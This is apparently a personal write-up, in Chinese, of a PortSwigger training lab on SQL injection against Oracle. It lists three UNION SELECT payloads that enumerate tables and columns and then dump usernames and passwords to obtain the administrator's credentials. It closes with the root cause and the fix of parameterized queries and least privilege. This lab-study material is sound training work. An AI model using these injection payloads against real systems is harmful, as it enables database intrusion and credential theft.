subject
Lab: SQL injection attack, listing the database contents on Oracle
Url: portswigger.net/web-securit…
Mind Palace
# 查询所有表名(all_tables 只列出当前数据库用户有权访问的表;原查询返回两列,所以用 null 补齐第一列)
' union select null,table_name from all_tables--
# ==> 查找到可疑表名:USERS_EMXHNC(表名和列名的后缀应为实验环境随机生成,每个实例可能不同)
# 查询列名
' union select null,column_name from all_tab_columns where table_name='USERS_EMXHNC'--
# ==> 获得列名:PASSWORD_RZRLAX USERNAME_HMDTHK
# 查询具体的值
' union select PASSWORD_RZRLAX,USERNAME_HMDTHK from USERS_EMXHNC--
# ==> 获得administrator账户的密码(根因:用户输入未经参数化就进入了SQL语句;修复方式是使用绑定变量/参数化查询,并按最小权限限制应用账号可访问的表)
END \(^o^)/